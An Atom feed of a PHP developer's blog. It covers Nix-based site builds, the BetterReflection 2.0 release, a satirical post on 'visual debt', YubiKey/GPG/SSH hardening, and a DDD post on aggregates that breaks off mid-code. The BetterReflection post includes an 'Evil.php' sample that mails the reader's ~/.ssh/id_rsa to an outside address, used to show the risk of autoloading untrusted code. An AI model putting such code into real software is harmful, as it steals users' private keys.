<![CDATA[]]> 2026-02-24T14:01:03+00:00 https://ocramius.github.io/ Sculpin <![CDATA[Reviving the blog]]> 2026-02-22T00:00:00+00:00 https://ocramius.github.io/blog/reviving-the-blog/ I'm back!

The last time I blogged was in 2017: a lot has changed since then, and after a decade of ignoring blogging, I will attempt to put some regularity into it again.

The times call for it: having a personal space that is really "our own" is extremely important, and it is as important as having something to read that is written by other humans, and not slop.

I mainly stopped blogging for two reasons:

  • Wordpress and similar tools are terrible, for rarely changing content. I'd rather not blog, than host a dynamic website just for serving static webpages
  • My static site generation pipeline heavily relied on my workstation's software dependencies, which shifted continuously, breaking the website build at all times.

Stabilizing the build

Note: This section describes the Nixification of the blog, done in this pull request. You can skip this, if you prefer reading the PR instead.

The first thing to do is to get everything under control again.

Since a few years back, I started heavily relying on Nix, a lazy functional language that is perfect to achieve reproducible builds and environments.

At the time of this writing, this website is built via Sculpin, a static website generator whose dependency upgrades I've neglected for far too long.

In order to "freeze" the build in time, I used a Nix Flake to pin all the dependencies down, preventing any further shifts in dependency versions:

{
  inputs = {
    nixpkgs.url = "github:nixos/nixpkgs?ref=nixos-unstable";
    flake-utils.url = "github:numtide/flake-utils";
  };

  outputs = { self, nixpkgs, flake-utils, composer2nix, ... }@inputs: 
    flake-utils.lib.eachDefaultSystem (
      system: {
        packages = {
          # things that will stay extremely stable will go here
        };
      }
    ); 
}

The above will "pin" dependencies such as composer or php, preventing them from drifting apart, unless a commit moves them. This is also thanks to the built-in flake.lock mechanism of Nix Flakes.

Because Composer does not compute content hashes of PHP dependencies, NixOS cannot directly use composer.json and composer.lock to download dependencies: that is an obstruction to reproducible builds, and requires a little detour.

Luckily, Sander van der Burg built a very useful composer2nix tool, which can be used to scan composer.lock entries, and compute their content hashes upfront:

{
  inputs = {
    # ...
    composer2nix = {
      url = "github:svanderburg/composer2nix";
      flake = false;
    };
  };

As you can see, composer2nix is not a flake: we still manage to use it ourselves, to process composer.lock locally:

update-php-packages = pkgs.writeShellScriptBin "generate-composer-to-nix.sh" ''
  set -euxo pipefail
  TMPDIR="$(${pkgs.coreutils}/bin/mktemp -d)"
  trap 'rm -rf -- "$TMPDIR"' EXIT
  mkdir "$TMPDIR/src"
  mkdir "$TMPDIR/composer2nix"
  ${pkgs.coreutils}/bin/cp -r "${./app}" "$TMPDIR/src/app"
  ${pkgs.coreutils}/bin/cp -r "${composer2nix}/." "$TMPDIR/composer2nix"
  ${pkgs.coreutils}/bin/chmod -R +w "$TMPDIR/composer2nix"
  ${pkgs.php84Packages.composer}/bin/composer install --working-dir="$TMPDIR/composer2nix" --no-scripts --no-plugins
  ${pkgs.php}/bin/php $TMPDIR/composer2nix/bin/composer2nix --name=${website-name}
  ${pkgs.coreutils}/bin/rm -f default.nix
'';

We can now run nix run .#update-php-packages to generate a very useful php-packages.nix, which will be used to produce our vendor/ directory later on.

The generated php-packages.nix looks a lot like this:

let
  packages = {
    "components/bootstrap" = {
      targetDir = "";
      src = composerEnv.buildZipPackage {
        name = "components-bootstrap-fca56bda4c5c40cb2a163a143e8e4271a6721492";
        src = fetchurl {
          url = "https://api.github.com/repos/components/bootstrap/zipball/fca56bda4c5c40cb2a163a143e8e4271a6721492";
          sha256 = "138fz0xp2z9ysgxfsnl7qqgh8qfnhv2bhvacmngnjqpkssz7jagx";
        };
      };
    };
    # ... and more

With that, we can then prepare a stable installation of the website generator:

  # ...
  built-blog-assets = derivation {
    name    = "built-blog-assets";
    src     = with-autoloader; # an intermediate step I omitted in this blogpost: check the original PR for details
    builder = pkgs.writeShellScript "generate-blog-assets.sh" ''
      set -euxo pipefail
      ${pkgs.coreutils}/bin/cp -r $src/. $TMPDIR
      cd $TMPDIR
      ${pkgs.php}/bin/php vendor/bin/sculpin generate --env=prod
      ${pkgs.coreutils}/bin/cp -r $TMPDIR/output_prod $out
    '';
    inherit system;
  };

Running nix build .#built-blog-assets now generates a ./result directory with the full website contents, and we know it won't break unless we update flake.lock, yay!

Let's publish these contents to Github Pages:

publish-to-github-pages = pkgs.writeShellScriptBin "publish-blog.sh" ''
  set -euxo pipefail
  TMPDIR="$(${pkgs.coreutils}/bin/mktemp -d)"
  trap 'rm -rf -- "$TMPDIR"' EXIT
  cd "$TMPDIR"
  ${pkgs.git}/bin/git clone [email protected]:Ocramius/ocramius.github.com.git .
  git checkout master
  ${pkgs.rsync}/bin/rsync --quiet --archive --filter="P .git*" --exclude=".*.sw*" --exclude=".*.un~" --delete "${built-blog-assets}/" ./
  git add -A :/
  git commit -a -m "Deploying sculpin-generated pages to \`master\` branch"
  git push origin HEAD
'';

We can now run nix run .#publish-to-github-pages to deploy the website!

Self-hosting: a minimal container

Since you are one of my smart readers, you probably already noticed how GitHub has been progressively enshittified by its umbilical cord with Microslop.

I plan to move the blog somewhere else soon-ish, so I already prepared an OCI container for it.

Since I will deploy it myself, I want a container with no shell, no root user, no filesystem access.

I stumbled upon mholt/caddy-embed, which embeds an entire static website into a single Go binary: perfect for my use-case.

The Caddy docs suggest using XCaddy for installing modules, but that is yet another build system that I don't want to have anything to do with. Instead, I cloned caddy-embed, and used NixPkgs' Go build system to embed my website into it:

  caddy-module-with-assets = derivation {
    name    = "caddy-module-with-assets";
    builder = pkgs.writeShellScript "generate-blog-assets.sh" ''
      set -euxo pipefail
      ${pkgs.coreutils}/bin/cp -r ${./caddy-embed/.} $out
      ${pkgs.coreutils}/bin/chmod +w $out/files/
      ${pkgs.coreutils}/bin/cp -rf ${built-blog-assets}/. $out/files/
    '';
    inherit system;
  };
  embedded-server = pkgs.buildGo126Module {
    name       = "embedded-server";
    src        = caddy-module-with-assets;
    # annoyingly, this will need to be manually updated at every `go.mod` change :-(
    vendorHash = "sha256-v0YXbAaftLLc+e8/w1xghW5OHRjT7Xi87KyLv1siGSc=";
  };

Same as with PHP, I'm pretty confident that Nix won't break unless flake.lock changes.

We can now bundle the built server into a docker container with a single Caddyfile attached. The following is effectively a Dockerfile, but reproducible and minimal:

runnable-container = pkgs.dockerTools.buildLayeredImage {
  name = website-name;
  tag  = "latest";

  contents = [
    (pkgs.writeTextDir "Caddyfile" (builtins.readFile ./caddy-embed/Caddyfile))
  ];

  config = {
    Cmd = [
      "${embedded-server}/bin/caddy-embed"
      "run"
    ];
  };
};

We can now:

  1. build the container via nix build .#runnable-container
  2. load the container via cat ./result | docker load
  3. run it via docker run --rm -ti -p8080:8080 ocramius.github.io:latest

The running container uses ~40Mb of RAM to exist (consider that it has all of the website in memory), and a quick test with wrk showed that it can handle over 60000 requests/second on my local machine.

❯ wrk -t 10 -d 30 -c 10  http://localhost:8080/
Running 30s test @ http://localhost:8080/
  10 threads and 10 connections
  Thread Stats   Avg      Stdev     Max   +/- Stdev
    Latency   165.35us   75.09us   3.91ms   90.49%
    Req/Sec     6.12k   365.53     7.05k    92.46%
  1833101 requests in 30.10s, 23.32GB read
Requests/sec:  60901.74
Transfer/sec:    793.44MB

Cleaning up the website

While cleaning up the builds, I found some really horrible stuff that should've gone away much earlier:

Google Analytics: kill it with fire! I'm not here to "convert visits": I'm here to help out my readers and make new connections. I am not a marketing department, and the privacy of my website visitors is more important than a website ticker that sends data to a US-based company.

Leftover JS/CSS: the website had various external CDNs in use, with CSS and JS files that were not really in use anymore. Cleaning these up felt good, and also reduced the number of external sites to zero.

Navigation menu simplified: this is a static website. An animated "burger menu" was certainly interesting a decade ago, but nowadays, it is just an annoying distraction, and extra navigation steps for visitors.

Disqus: this used to be a useful way to embed a threaded comment section inside a static website, but it is no longer relevant to me, as it becomes an extra inbox to manage. Disqus was also cluttered with trackers, which should not be there.

Next steps?

This first post is about "being able to blog again", but there's more to do.

I certainly want to self-host things, having my blog under my own domain, rather than under *.github.io.

I also want comments again, but they need to come from the Fediverse, rather than being land-locked in a commenting platform. Other people have attempted this, and I shall do it too.

Perhaps I may remove that 3D avatar at the top of the page? It took a lot of time to write, with Blender, THREEJS, and it uses your video card to run: perhaps not the best energy-efficient choice for a static website, but I'm still emotionally attached to it.

Also, this website is filled with reference information that no longer holds true: a decade has passed, and my OSS positions have vastly changed, and so will pages that describe what I do.

Finally, I want it to be clear that this is a website by a human, for other humans: I will therefore start cryptographically signing my work, allowing others to decide whether they trust what I wrote myself, without a machine generating any of it.

And you?

If you are still here and reading: thank you for passing by, dear fellow human.

Hoping that this has inspired you a bit, I'm looking forward to seeing your own efforts to self-host your own website!

]]>
<![CDATA[BetterReflection version 2.0.0 released]]> 2017-09-18T00:00:00+00:00 https://ocramius.github.io/blog/roave-better-reflection-v2.0/ Roave's BetterReflection 2.0.0s was released today!

I and James Titcumb started working on this project back in 2015, and it is a pleasure to see it reaching maturity.

The initial idea was simple: James would implement all my wicked ideas, while I would lay back and get drunk on Drambuie.

Me, drunk in bed. Photo by @Asgrim, since I was too drunk to human

Yes, that actually happened. Thank you, James, for all the hard work! 🍻

(I did some work too, by the way!)

What the heck is BetterReflection?

Jokes apart, the project is quite ambitious, and it aims at reproducing the entirety of the PHP reflection API without having any actual autoloading being triggered.

When put in use, it looks like this:

<?php

// src/MyClass.php

namespace MyProject;

class MyClass
{
    public function something() {}
}
<?php

// example1.php

use MyProject\MyClass;
use Roave\BetterReflection\BetterReflection;
use Roave\BetterReflection\Reflection\ReflectionMethod;

require_once __DIR__ . '/vendor/autoload.php';

$myClass = (new BetterReflection())
    ->classReflector()
    ->reflect(MyClass::class);

$methodNames = \array_map(function (ReflectionMethod $method) : string {
    return $method->getName();
}, $myClass->getMethods());

\var_dump($methodNames);

// class was not loaded:
\var_dump(\sprintf('Class %s loaded: ', MyClass::class));
\var_dump(\class_exists(MyClass::class, false));

As you can see, the difference is just in how you bootstrap the reflection API.

Also, we do provide a fully backwards-compatible reflection API that you can use if your code heavily relies on ext-reflection:

<?php

// example2.php

use MyProject\MyClass;
use Roave\BetterReflection\BetterReflection;
use Roave\BetterReflection\Reflection\Adapter\ReflectionClass;

require_once __DIR__ . '/vendor/autoload.php';

$myClass = (new BetterReflection())
    ->classReflector()
    ->reflect(MyClass::class);

$reflectionClass = new ReflectionClass($myClass);

// You can just use it wherever you had `ReflectionClass`!
\var_dump($reflectionClass instanceof \ReflectionClass);
\var_dump($reflectionClass->getName());

How does that work?

The operational concept is quite simple, really:

  1. We scan your codebase for files matching the one containing your class. This is fully configurable, but by default we use some ugly autoloader hacks to find the file without wasting disk I/O.
  2. We feed your PHP file to PHP-Parser
  3. We analyse the produced AST and wrap it in a matching Roave\BetterReflection\Reflection\* class instance, ready for you to consume it.

The hard part is tracking the miriad of details of the PHP language, which is very complex and cluttered with scope, visibility and inheritance rules: we take care of it for you.

Use case scenarios

The main use-cases for BetterReflection are most likely around security, code analysis and AOT compilation.

One of the most immediate use-cases will likely be in PHPStan, which will finally be able to inspect hideous mixed OOP/functional/procedural code if the current WIP implementation works as expected.

Since you can now "work" with code before having loaded it, you can harden API around a lot of security-sensitive contexts. A serializer may decide to not load a class if side-effects are contained in the file declaring it:

<?php

// Evil.php
\mail(
    '[email protected]',
    'All ur SSH keys are belong to us',
    \file_get_contents('~/.ssh/id_rsa')
);

// you really don't want to autoload this bad one:
class Evil {}

The same goes for classes implementing malicious __destruct code, as well as classes that may trigger autoloading of other malicious code.

It is also possible to analyse code that is downloaded from the internet without actually running it. For instance, code may be checked against GPG signatures in the file signature before being run, effectively allowing PHP to "run only signed code". Composer, anybody?

If you are more into code analysis, you may decide to compare two different versions of a library, and scan for BC breaks:

<?php
// the-library/v1/src/SomeApi.php

class SomeAPI
{
    public function sillyThings() { /* ... */ }
}
<?php
// the-library/v2/src/SomeApi.php

class SomeAPI
{
    public function sillyThings(UhOh $bcBreak) { /* ... */ }
}

In this scenario, somebody added a mandatory parameter to SomeAPI#sillyThings(), effectively introducing a BC break that is hard to detect without having both versions of the code available, or a good migration documentation (library developers: please document this kind of change!).

Another way to leverage the power of this factory is to compile factory code into highly optimised dependency injection containers, like PHP-DI started doing.

Future use cases?

In addition to the above use-case scenarios, we are working on additional functionality that would allow changing code before loading it .

Is that a good idea?

... I honestly don't know.

Still, there are proper use-case scenarios around AOP and proxying libraries, which would then be able to work even with final classes.

You will likely see these features appear in a new, separate library.

Credits

To conclude, I would like to thank James Titcumb, Jaroslav Hanslík, Marco Perone and Viktor Suprun for the effort they put in this release, providing patches, improvements and overall helping us building something that may become extremely useful in the PHP ecosystem.

]]>
<![CDATA[Eliminating Visual Debt]]> 2017-05-29T00:00:00+00:00 https://ocramius.github.io/blog/eliminating-visual-debt/ Today we're talking about Visual debt in our code.

As an introduction, I suggest to watch this short tutorial about visual debt by @jeffrey_way.

The concept is simple: let's take the example from Laracasts and re-visit the steps taken to remove visual debt.

interface EventInterface {
    public function listen(string $name, callable $handler) : void;
    public function fire(string $name) : bool;
}

final class Event implements EventInterface {
    protected $events = [];

    public function listen(string $name, callable $handler) : void
    {
        $this->events[$name][] = $handler;
    }

    public function fire(string $name) : bool
    {
        if (! array_key_exists($name, $this->events)) {
            return false;
        }

        foreach ($this->events[$name] as $event) {
            $event();
        }

        return true;
    }
}

$event = new Event;

$event->listen('subscribed', function () {
    var_dump('handling it');
});

$event->listen('subscribed', function () {
    var_dump('handling it again');
});

$event->fire('subscribed');

So far, so good.

We have an event that obviously fires itself, a concrete implementation and a few subscribers.

Our code works, but it contains a lot of useless artifacts that do not really influence our ability to make it run.

These artifacts are also distracting, moving our focus from the runtime to the declarative requirements of the code.

Let's start removing the bits that aren't needed by starting from the method parameter and return type declarations:

interface EventInterface {
    public function listen($name, $handler);
    public function fire($name);
}

final class Event implements EventInterface {
    protected $events = [];

    public function listen($name, $handler)
    {
        $this->events[$name][] = $handler;
    }

    public function fire($name)
    {
        if (! array_key_exists($name, $this->events)) {
            return false;
        }

        foreach ($this->events[$name] as $event) {
            $event();
        }

        return true;
    }
}

Our code is obvious, so the parameters don't need redundant declarations or type checks. Also, we are aware of our own implementation, so the runtime checks are not needed, as the code will work correctly as per manual or end to end testing. A quick read will also provide sufficient proof of correctness.

Since the code is trivial and we know what we are doing when using it, we can remove also the contract that dictates the intended usage. Let's remove those implements and interface symbols.

final class Event {
    protected $events = [];

    public function listen($name, $handler)
    {
        $this->events[$name][] = $handler;
    }

    public function fire($name)
    {
        if (! array_key_exists($name, $this->events)) {
            return false;
        }

        foreach ($this->events[$name] as $event) {
            $event();
        }

        return true;
    }
}

Removing the contract doesn't change the runtime behavior of our code, which is still technically correct. Consumers will also not need to worry about correctness when they use `Event`, as a quick skim over the implementation will reveal its intended usage.

Also, since the code imposes no limitations on the consumer, who is responsible for the correctness of any code touching ours, we are not going to limit the usage of inheritance.

class Event {
    // ... 
}

That's as far as the video goes, with a note that the point is to "question everything".

Bringing it further

Jeffrey then pushed this a bit further, saying that best practices don't exist, and people are pretty much copying stale discussions about coding approaches:

According to that, I'm going to question the naming chosen for our code. Since the code is trivial and understandable at first glance, we don't need to pick meaningful names for variables, methods and classes:

class A {
    protected $a = [];

    public function a1($a1, $a2)
    {
        $this->a[$a1][] = $a2;
    }

    public function a2($a1)
    {
        if (! array_key_exists($a1, $this->a)) {
            return false;
        }

        foreach ($this->a[$a1] as $a) {
            $a();
        }

        return true;
    }
}

This effectively removes our need to look at the code details, making the code shorter and runtime-friendly. We're also saving some space in the PHP engine!

Effectively, this shows us that there are upsides to this approach, as we move from read overhead to less engine overhead. We also stop obsessing after the details of our Event, as we already previously defined it, so we remember how to use it.

Since the Event type is not really useful to us, as nothing type-hints against it, we can remove it. Let's move back to dealing with a structure of function pointers:

function A () {
    $a = [];

    return [
        function ($a1, $a2) use (& $a) {
            $a[$a1][] = $a2;
        },
        function ($a1) use (& $a) {
            if (! array_key_exists($a1, $a)) {
                return false;
            }

            foreach ($a[$a1] as $a2) {
                $a2();
            }

            return true;
        },
    ];
}


$a = A();

$a[0]('subscribed', function () {
    var_dump('handling it');
});

$a[0]('subscribed', function () {
    var_dump('handling it again');
});

$a[1]('subscribed');

This code is equivalent, and doesn't use any particularly fancy structures coming from the PHP language, such as classes. We are working towards reducing the learning and comprehension overhead.

Conclusion

If you haven't noticed before, this entire post is just sarcasm.

Please don't do any of what is discussed above, it is a badly crafted oxymoron.

Please don't accept what Jeffrey says in that video.

Please do use type systems when they are available, they actually reduce "visual debt" (is it even a thing?), helping you distinguish apples from pies.

Please do use interfaces, as they reduce clutter, making things easier to follow from a consumer perspective, be it a human or an automated tool.

This is all you need to understand that Event mumbo-jumbo (which has broken naming, by the way, but this isn't an architecture workshop). Maybe add some API doc:

interface EventInterface {
    /**
     * Attach an additional listener to be fired when calling 
     * `fire` with `$name`
     */
    public function listen(string $name, callable $handler) : void;

    /**
     * Execute all listeners assigned to `$name`
     *
     * @return bool whether any listener was executed
     */
    public function fire(string $name) : bool;
}

This is not a really good interface, but it's a clear, simple and readable one. No "visual debt". Somebody reading this will thank you later. Maybe it will be you, next year.

Please do follow best practices. They work. They help you avoiding stupid mistakes. . Bad code can lead to terrible consequences, and you don't know where your code will be used. And yes, I'm picking examples about real-time computing, because that's what makes it to the news. OWASP knows more about all this.

Please remember that your job is reading, understanding and thinking before typing, and typing is just a side-effect.

And please, please, please: remember that most of your time you are not coding for yourself alone. You are coding for your employer, for your team, for your project, for your future self.

]]>
<![CDATA[YubiKey for SSH, Login, 2FA, GPG and Git Signing]]> 2017-04-15T00:00:00+00:00 https://ocramius.github.io/blog/yubikey-for-ssh-gpg-git-and-local-login/ I've been using a YubiKey Neo for a bit over two years now, but its usage was limited to 2FA and U2F.

Last week, I received my new DELL XPS 15 9560, and since I am maintaining some high impact open source projects, I wanted the setup to be well secured.

In addition to that, I caught a bad flu, and that gave me enough excuses to waste time in figuring things out.

In this article, I'm going to describe what I did, and how you can reproduce my setup for your own safety as well as the one of people that trust you.

Yubi-WHAT?

In first place, you should know that I am absolutely not a security expert: all I did was following the online tutorials that I found. I also am not a cryptography expert, and I am constantly dissatisfied with how the crypto community reduces everything into a TLA, making even the simplest things impossible to understand for mere mortals.

First, let's clarify what a YubiKey is.

A YubiKey Neo on a cat

That thing is a YubiKey.

What does it do?

It's basically an USB key filled with crypto features. It also is (currently) impossible to make a physical copy of it, and it is not possible to extract information written to it.

It can:

  • Generate HMAC hashes (kinda)
  • Store GPG private keys
  • Act as a keyboard that generates time-based passwords
  • Generate 2FA time-based login codes

What do we need?

In order to follow this tutorial, you should have at least 2 (two) YubiKey Neo or equivalent devices. This means that you will have to spend approximately USD 100: these things are quite expensive. You absolutely need a backup key, because all these security measures may lock you out of your systems if you lose or damage one.

Our kickass setup will allow us to do a series of cool things related to daily development operations:

  • Two Factor Authentication
  • PAM Authentication (logging into your linux/mac PC)
  • GPG mail and GIT commit signing/encrypting
  • SSH Authentication

Covered YubiKey features

I am not going to describe the procedures in detail, but just link them and describe what we are doing, and why.

Setting up NFC 2FA

Simple NFC-based 2FA with authentication codes will be useful for most readers, even non-technical ones.

What we are doing is simply seed the YubiKey with Google Authenticator codes, except that we will use the Yubico Authenticator . This will only work for the "primary" key (the one we will likely bring with us at all times).

What we will have to do is basically:

  1. Install some Yubico utility to manage your Yubikey NEO
  2. Plug in your YubiKey and enable OTP and U2F
  3. Install the Yubico Authenticator
  4. Seed your Yubikey with the 2FA code provided by a compatible website

The setup steps are described in the official Yubico website .

Once the YubiKey is configured with at least one website that supports the "Google Authenticator" workflow, we should be able to:

  1. Open the Yubico Authenticator
  2. Tap the YubiKey against our phone's NFC sensor
  3. Use the generated authentication code

Example Yubico Authenticator screen

One very nice (and unclear, at first) advantage of having a YubiKey seeded with 2FA codes is that we can now generate 2FA codes on any phone, as long as we have our YubiKey with us.

I already had to remote-lock and remote-erase a phone in the past, and losing the Google Authenticator settings is not fun. If you handle your YubiKey with care, you shouldn't have that problem anymore.

Also, a YubiKey is water-proof: our 2017 phone probably isn't.

Setting up PAM authentication

CAUTION: this procedure can potentially lead us to lose sudo access from our account, as well as lock us out of our computer. I take no responsibility: try it in a VM first, if you do not feel confident.

We want to make sure that we can log into our personal computer or workstation only when we are physically sitting at it. This means that we need the YubiKey must be plugged in for a password authentication to succeed.

Each login prompt, user password prompt or sudo command should require both our account password and our YubiKey.

What we will have to do is basically:

  1. Install libpam-yubico
  2. Enable some capabilities of our YubiKeys with ykpersonalize
  3. Generate an initial challenge file for each YubiKey (you bought at least 2, right?) with ykpamcfg
  4. Deploy the generated files in a root-only accessible path
  5. IMPORTANT start a sudo session, and be ready to revert changes from there if things go wrong
  6. Configure PAM to also expect a challenge response from a YubiKey (reads: a recognized YubiKey must be plugged in when trying to authenticate)

The steps to perform that are in the official Yubico tutorial .

If everything is done correctly, every prompt asking for our Linux/Mac account password should fail when no YubiKey is plugged in.

TIP: configure the libpam-yubico integration in debug mode, as we will often have a "WTH?" reaction when authentication isn't working. That may happen if there are communication errors with the YubiKey.

This setup has the advantage of locking out anyone trying to bruteforce our password, as well as stopping potentially malicious background programs from performing authentication or sudo commands while we aren't watching.

CAUTION: the point of this sort of setup is to guarantee that login can only happen with the physical person at the computer. If we want to go to the crapper, we lock lock computer, and bring our YubiKey with us.

Setting up GPG

This is probably the messiest part of the setup, as a lot of CLI tool usage is required.

Each YubiKey has the ability to store 3 separate keys for signing, encrypting and authenticating.

We will therefore create a series of GPG keys:

  1. A GPG master key (if we don't already have a GPG key)
  2. A sub-key for signing (marked [S] in the gpg interactive console)
  3. A sub-key for encrypting (marked [E] in the gpg interactive console)
  4. A sub-key for authenticating (marked [A] in the gpg interactive console)
  5. Generate these 3 sub-keys for each YubiKey we have (3 keys per YubiKey)

CAUTION: as far as I know, the YubiKey Neo only supports RSA keys up to 2048 long. Do not use 4096 for the sub-key length unless we know that the key type supports it.

After that, we will move the private keys to the YubiKeys with the gpg keytocard command.

CAUTION: the keytocard command is destructive. Once we moved a private key to a YubiKey, it is removed from our local machine, and it cannot be recovered. Be sure to only move the correct sub-keys.

NOTE: being unable to recover the private sub-key is precisely the point of using a YubiKey: nobody can steal or misuse that keys, no malicious program can copy it, plus we can use it from any workstation.

Also, we will need to set a PIN and an admin PIN.   These defaults for these two are respectively 123456   and    12345678. The PIN will be needed each time we plug in we YubiKey to use any of the private keys stored in it.

   CAUTION:   we only have    3 attempts for entering our PIN. Should we fail all   attempts, then the YubiKey will be locked, and we   will have to move new GPG sub-keys to it before being able to use it again. This prevents bruteforcing after physical theft.

After our gpg sub-keys and PINs are written to the YubiKeys, let's make a couple of secure backups of our master gpg secret key. Then delete it from the computer Keep just the public key.

The master private gpg key should only be used to generate new sub-keys, if needed, or to revoke them, if we lose one or more of our physical devices.

We should now be able to:

  • Sign messages with the signing key stored in our YubiKey (only if plugged in) and its PIN
  • Verify those messages with the master public key
  • Encrypt messages with the master public key
  • Decrypt messages with the encryption key stored in the YubiKey (only if plugged in) and its PIN

The exact procedure to achieve all this is described in detail (with console output and examples) at drduh/YubiKey-Guide .

GIT commit signing

Now that we can sign messages using the GPG key stored in our YubiKey, usage with GIT becomes trivial:

git config --global user.signingkey=<yubikey-signing-sub-key-id>

We will now need to plug in our YubiKey and enter our PIN when signing a tag:

git tag -s this-is-a-signed-tag -m "foo"

Nobody can release software on our behalf without physical access to our YubiKey, as well as our YubiKey PIN.

Signing/Encrypting email messages

In order to sign/encrypt emails, we will need to install Mozilla Thunderbird and Enigmail .

The setup will crash a few times. I suggest going through the "advanced" settings, then actually selecting a signing/encryption key when trying to send a signed/encrypted message. Enigmail expects the key to be a file or similar, but this approach will allow us to just give it the private GPG key identifier.

Sending mails is still a bit buggy: Thunderbird will ask for the pin 3 times, as if it failed to authenticate, but the third attempt will actually succeed. This behavior will be present in a number of prompts, not just within Thunderbird.

! Nobody can read our encrypted emails, unless the YubiKey is plugged in. If our laptop is stolen, these secrets will be protected.

SSH authentication

There is one GPG key that we didn't use yet: the authentication one.

There is a (relatively) recent functionality of gpg-agent that allows it to behave as an ssh-agent.

To make that work, we will simply kill all existing SSH and GPG agents:

sudo killall gpg-agent
sudo killall ssh-agent
# note: eval is used because the produced STDOUT is a bunch of ENV settings
eval $( gpg-agent --daemon --enable-ssh-support )

Once we've done that, let's try running:

ssh-add -L

Assuming we don't have any local SSH keys, the output should be something like:

ocramius@ocramius-XPS-15-9560:~$ ssh-add -L
The agent has no identities.

If we plug in our YubiKey and try again, the output will be:

ocramius@ocramius-XPS-15-9560:~$ ssh-add -L
ssh-rsa AAAAB3NzaC ... pdqtlwX6m1 cardno:000123457915

MAGIC! gpg-agent is exposing the public GPG key as an SSH key.

If we upload this public key to a server, and then try logging in with the YubiKey plugged in, we will be asked for the YubiKey PIN, and will then just be able to log in as usual.

Nobody can log into our remote servers without having the physical key device.

We can log into our remote servers from any computer that can run gpg-agent. Just always bring our YubiKey with ourselves.

CAUTION: Each YubiKey with an authentication gpg sub-key will produce a different public SSH key: we will need to seed our server with all the SSH public keys.

TIP: consider using the YubiKey identifier (written on the back of the device) as the comment for the public SSH key, before storing it.

Steps to set up gpg-agent for SSH authentication are also detailed in drduh/YubiKey-Guide .

Custom SSH keys are no longer needed: our GPG keys cover most usage scenarios.

Conclusion

We now have at least 2 physical devices that give us access to very critical parts of our infrastructure, messaging, release systems and computers in general.

At this point, I suggest keeping one always with ourselves, and treating it with extreme care. I made a custom 3d-printed case for my YubiKey , and then put it all together in my physical keychain:

My physical keychain

The backup key is to be kept in a secure location: while theft isn't a big threat with YubiKeys, getting locked out of all our systems is a problem. Make sure that you can always either recover a YubiKey or the master GPG key.

]]>
<![CDATA[On Aggregates and Domain Service interaction]]> 2017-01-25T00:00:00+00:00 https://ocramius.github.io/blog/on-aggregates-and-external-context-interactions/ Some time ago, I was asked where I put I/O operations when dealing with aggregates.

The context was a CQRS and Event Sourced architecture, but in general, the approach that I prefer also applies to most imperative ORM entity code (assuming a proper data-mapper is involved).

Scenario

Let's use a practical example:

Feature: credit card payment for a shopping cart checkout

  Scenario: a user must be able to check out a shopping cart
    Given the user has added some products to their shopping cart
    When the user checks out the shopping cart with their credit card
    Then the user was charged for the shopping cart total price

  Scenario: a user must not be able to check out an empty shopping cart
    When the user checks out the shopping cart with their credit card
    Then the user was not charged

  Scenario: a user cannot check out an already purchased shopping cart
    Given the user has added some products to their shopping cart
    And the user has checked out the shopping cart with their credit card
    When the user checks out the shopping cart with their credit card
    Then the user was not charged

The scenario is quite generic, but you should be able to see what the application is supposed to do.

An initial implementation

I will take an imperative command + domain-events approach, but we don't need to dig into the patterns behind it, as it is quite simple.

We are looking at a command like following:

final class CheckOutShoppingCart
{
    public static function from(
        CreditCardCharge $charge,
        ShoppingCartId $shoppingCart
    ) : self {
        // ...
    }

    public function charge() : CreditCardCharge { /* ... */ }
    public function shoppingCart() : ShoppingCartId { /* ... */ }
}

If you are unfamiliar with what a command is, it is just the object that our frontend or API throws at our actual application logic.

Then there is an aggregate performing the actual domain logic work:

final class ShoppingCart
{
    // ... 

    public function checkOut(CapturedCreditCardCharge $charge) : void
    {
        $this->charge = $charge;

        $this->raisedEvents[] = ShoppingCartCheckedOut::from(
            $this->id,
            $this->charge
        );
    }

    // ... 
}

If you are unfamiliar with what an aggregate is, it is the direct object in our interaction (look at the sentences in the scenario). In your existing applications, it would most likely (but not exclusively) be an entity or a DB record or group of entities/DB records that you are considering during a business interaction.

We need to glue this all together with a command handler:

final class HandleCheckOutShoppingCart
{
    public function __construct(Carts $carts, PaymentGateway $gateway)
    {
        $this->carts   = $carts;
        $this->gateway = $gateway;
    }

    public function __invoke(CheckOutShoppingCart $command) : void
    {
        $shoppingCart = $this->carts->get($command->shoppingCart());

        $payment = $this->gateway->captureCharge($command->charge());

        $shoppingCart->checkOut($payment);
    }
}

This covers the "happy path" of our workflow, but we still lack:

  • The ability to check whether the payment has already occurred
  • Preventing payment for empty shopping carts
  • Preventing payment of an incorrect amount
  • Handling of critical failures on the payment gateway

In order to do that, we have to add some "guards" that prevent the interaction. This is the approach that I've seen being used in the wild:

final class HandleCheckOutShoppingCart
{
    // ... 

    public function __invoke(CheckOutShoppingCart $command) : void
    {
        $cartId = $command->shoppingCart();
        $charge = $command->charge();

        $shoppingCart = $this->carts->get($cartId);

        // these guards are injected callables. They throw exceptions:
        ($this->nonEmptyShoppingCart)($cartId);
        ($this->nonPurchasedShoppingCart)($cartId);
        ($this->paymentAmountMatches)($cartId, $charge->amount());

        $payment = $this->gateway->captureCharge($charge);

        $shoppingCart->checkOut($payment);
    }
}

As you can see, we are adding some logic to our command handler here. This is usually done because dependency injection on the command handler is easy. Passing services to the aggregate via dependency injection is generally problematic and to be avoided, since an aggregate is usually a "newable type".

With this code, we are able to handle most unhappy paths, and eventually also failures of the payment gateway (not in this article).

The problem

While the code above works, what we did is adding some domain-specific logic to the command handler. Since the command handler is part of our application layer, we are effectively diluting these checks into "less important layers".

In addition to that, the command handler is required in tests that consume the above specification: without the command handler, our logic will fail to handle the unhappy paths in our scenarios.

For those that are reading and practice CQRS+ES: you also know that those guards aren't always simple to implement! Read models, projections... Oh my!

Also: what if we wanted to react to those failures, rather than just stop execution? Who is responsible or that?

If you went with the TDD way, then you already saw all of this coming: let's fix it!

Moving domain logic back into the domain

What we did is putting logic from the domain layer (which should be in the aggregate) into the application layer: let's turn around and put domain logic in the domain (reads: in the aggregate logic).

Since we don't really want to inject a payment gateway as a constituent part of our aggregate root (a newable shouldn't have non-newable depencencies), we just borrow a brutally simple concept from functional programming: we pass the interactor as a method parameter.

final class ShoppingCart
{
    // ... 

    public function checkOut(
        CheckOutShoppingCart $checkOut,
        PaymentGateway $paymentGateway
    ) : void {
        $charge = $checkOut->charge();

        Assert::null($this->payment, 'Already purchased');
        Assert::greaterThan(0, $this->totalAmount, 'Price invalid');
        Assert::same($this->totalAmount, $charge->amount());

        $this->charge = $paymentGateway->captureCharge($charge);

        $this->raisedEvents[] = ShoppingCartCheckedOut::from(
